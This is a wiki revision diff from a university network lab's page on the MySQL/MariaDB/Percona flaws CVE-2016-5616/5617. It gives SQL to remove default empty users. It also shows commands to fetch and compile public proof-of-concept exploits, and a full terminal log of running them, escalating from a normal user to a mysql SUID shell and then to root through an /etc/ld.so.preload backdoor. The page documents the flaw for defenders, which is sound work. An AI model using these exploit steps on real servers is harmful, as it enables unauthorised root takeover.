Network System Laboratory - Backup diff of CVE/2016-5616 vs current(No. 1)

View the diff.
View the source.
Go to CVE/2016-5616.

--- 1: 2016-11-11 (Fri) 11:23:42 iseki
+++ Cur: 2016-11-11 (Fri) 15:46:20 iseki
@@ Line 1: / Line 1: @@
-*** CVE-2016-5616, 5617 [#u7059892]
+** CVE-2016-5616, 5617 [#u7059892]
+*** [[MySQL]], [[MariaDB]], [[Percona]] [#t6c6abf6]
 - 該当マシンにアカウントがあり，データベースのアクセス（書き込み）可能な場合，Root権限を奪取される
-- MySQL の初期ユーザ等が残っている場合は，特に危険．
+- MySQL の初期ユーザ等が残っている場合は特に危険．
+- [[CVE-2016-5616>http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5616]]
+- [[CVE-2016-5617>http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5617]]
 - http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
 - http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html
+#br
-- デフォルトの
+**** デフォルトユーザ [#c3c58224]
+- パスワードなし，ユーザ名なしのデータはインストール時に削除すべき．
+ MariaDB [(none)]> use mysql;
  MariaDB [mysql]> select Host,User,Password from user;
  +-----------+------+-------------------------------------------+
@@ Line 19: / Line 27: @@
  +-----------+------+-------------------------------------------+
+- 以下のコマンドで削除しておく
-[iseki@rigel-b ~]:439$ ./mysql-privesc-race '' '' localhost test
+ MariaDB [(none)]> use mysql;
+ MariaDB [mysql]> delete from user where user='';
+ MariaDB [mysql]> delete from user where password='';
-MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit
+**** mysql ユーザアカウントのダッシュ [#z9d7510f]
-mysql-privesc-race.c (ver. 1.0)
+- Exploit code : [[mysql-privesc-race.c>ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-privesc-race.c]]
-CVE-2016-6663 / CVE-2016-5616
+ $ wget ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-privesc-race.c
+ $ gcc -o mysql-privesc-race mysql-privesc-race.c -I/usr/local/mysql/include/mysql -L/usr/local/mysql/lib -lmysqlclient
-For testing purposes only. Do no harm.
-Discovered/Coded by:
+ [iseki@rigel-b ~]:439$ ./mysql-privesc-race '' '' localhost test
-Dawid Golunski
+ MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit
-http://legalhackers.com
+ mysql-privesc-race.c (ver. 1.0)
+ CVE-2016-6663 / CVE-2016-5616
-[+] Starting the exploit as:
-uid=502(iseki) gid=100(users) 所属グループ=100(users)
+ For testing purposes only. Do no harm.
-[+] Connecting to the database `test` as @localhost
+ Discovered/Coded by:
-[+] Creating exploit temp directory /tmp/mysql_privesc_exploit
+ Dawid Golunski
+ http://legalhackers.com
-[+] Creating mysql tables
-DROP TABLE IF EXISTS exploit_table
+ [+] Starting the exploit as:
-DROP TABLE IF EXISTS mysql_suid_shell
+ uid=502(iseki) gid=100(users) 所属グループ=100(users)
-CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit'
-CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit'
+ [+] Connecting to the database `test` as @localhost
-[+] Copying bash into the mysql_suid_shell table.
+ [+] Creating exploit temp directory /tmp/mysql_privesc_exploit
+ [+] Creating mysql tables
+ DROP TABLE IF EXISTS exploit_table
+ DROP TABLE IF EXISTS mysql_suid_shell
+ CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit'
+ CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit'
+ [+] Copying bash into the mysql_suid_shell table.
     After the exploitation the following file/table will be assigned SUID and executable bits :
--rw-rw---- 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD
+ -rw-rw---- 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD
-[+] Entering the race loop... Hang in there...
+ [+] Entering the race loop... Hang in there...
-->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->
+ ->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->->
-[+] Bingo! Race won (took 12874 tries) ! Check out the mysql SUID shell:
+ [+] Bingo! Race won (took 12874 tries) ! Check out the mysql SUID shell:
--rwsrwxrwx 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD
+ -rwsrwxrwx 1 mysql users 941880 11月 11 09:37 2016 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD
-[+] Spawning the mysql SUID shell now...
+ [+] Spawning the mysql SUID shell now...
     Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :)
+ mysql_suid_shell.MYD-4.1$ whoami
+ mysql
-mysql_suid_shell.MYD-4.1$ whoami
+**** mysql アカウントからの root アカウントのダッシュ [#l4b08281]
-mysql
+- Exploit code :  [[mysql-chowned.sh>ftp://www.nsl.tuis.ac.jp/pub/mariadb/Vulnerabilities/mysql-chowned.sh]]
-mysql_suid_shell.MYD-4.1$ ./mysql-chowned.sh /var/mysql/rigel-b.err
-MySQL / MariaDB / Percona - Root Privilege Escalation PoC Exploit
-mysql-chowned.sh (ver. 1.0)
-CVE-2016-6664 / CVE-2016-5617
-Discovered and coded by:
-Dawid Golunski
-http://legalhackers.com
-[+] Starting the exploit as
-uid=502(iseki) gid=100(users) euid=103(mysql) 所属グループ=100(users)
-[+] Target MySQL log file set to /var/mysql/rigel-b.err
-[+] Compiling the privesc shared library (/tmp/privesclib.c)
-[+] Backdoor/low-priv shell installed at:
--rwxr-xr-x 1 mysql users 941880 11月 11 09:52 2016 /tmp/mysqlrootsh
-[+] Symlink created at:
-lrwxrwxrwx 1 mysql users 18 11月 11 09:52 2016 /var/mysql/rigel-b.err -> /etc/ld.so.preload
-[+] Waiting for MySQL to re-open the logs/MySQL service restart...
-[+] Waiting for MySQL to re-open the logs/MySQL service restart...
-./mysql-chowned.sh: line 153: pidof: コマンドが見つかりません
-Do you want to kill mysqld process  to instantly get root? :) ? [y/n] y
-Got it. Executing 'killall mysqld' now...
-[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges:
--rw-r----- 1 mysql root 19 11月 11 09:52 2016 /etc/ld.so.preload
-[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload
-[+] The /etc/ld.so.preload file now contains:
-/tmp/privesclib.so
-[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
--rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh
-[+] Rootshell got assigned root SUID perms at:
--rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh
-Got root! The database server has been ch-OWNED !
-[+] Spawning the rootshell /tmp/mysqlrootsh now!
-mysqlrootsh-4.1# whoami
-root
-[/code]
+ mysql_suid_shell.MYD-4.1$ ./mysql-chowned.sh /var/mysql/rigel-b.err
+ MySQL / MariaDB / Percona - Root Privilege Escalation PoC Exploit
+ mysql-chowned.sh (ver. 1.0)
+ CVE-2016-6664 / CVE-2016-5617
+ Discovered and coded by:
+ Dawid Golunski
+ http://legalhackers.com
+ [+] Starting the exploit as
+ uid=502(iseki) gid=100(users) euid=103(mysql) 所属グループ=100(users)
+ [+] Target MySQL log file set to /var/mysql/rigel-b.err
+ [+] Compiling the privesc shared library (/tmp/privesclib.c)
+ [+] Backdoor/low-priv shell installed at:
+ -rwxr-xr-x 1 mysql users 941880 11月 11 09:52 2016 /tmp/mysqlrootsh
+ [+] Symlink created at:
+ lrwxrwxrwx 1 mysql users 18 11月 11 09:52 2016 /var/mysql/rigel-b.err -> /etc/ld.so.preload
+ [+] Waiting for MySQL to re-open the logs/MySQL service restart...
+ [+] Waiting for MySQL to re-open the logs/MySQL service restart...
+ ./mysql-chowned.sh: line 153: pidof: コマンドが見つかりません
+ Do you want to kill mysqld process  to instantly get root? :) ? [y/n] y
+ Got it. Executing 'killall mysqld' now...
+ [+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges:
+ -rw-r----- 1 mysql root 19 11月 11 09:52 2016 /etc/ld.so.preload
+ [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload
+ [+] The /etc/ld.so.preload file now contains:
+ /tmp/privesclib.so
+ [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
+ -rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh
+ [+] Rootshell got assigned root SUID perms at:
+ -rwsrwxrwx 1 root root 941880 11月 11 09:52 2016 /tmp/mysqlrootsh
+ Got root! The database server has been ch-OWNED !
+ [+] Spawning the rootshell /tmp/mysqlrootsh now!
+ mysqlrootsh-4.1# whoami
+ root

Backup list of CVE/2016-5616
Backup diff of CVE/2016-5616 vs current(No. All)
- 1: 2016-11-11 (Fri) 11:23:42 iseki
- 2: 2016-11-11 (Fri) 11:48:56 iseki

Backup diff of CVE/2016-5616 vs current(No. 1)

Site Search

Login

Sub Menu

Books

mini Calendar

Who's Online

Access Counter

Backup diff of CVE​/2016-5616 vs current(No. 1)

Site Search

Login

Sub Menu

Books

mini Calendar

Who's Online

Access Counter

Backup diff of CVE/2016-5616 vs current(No. 1)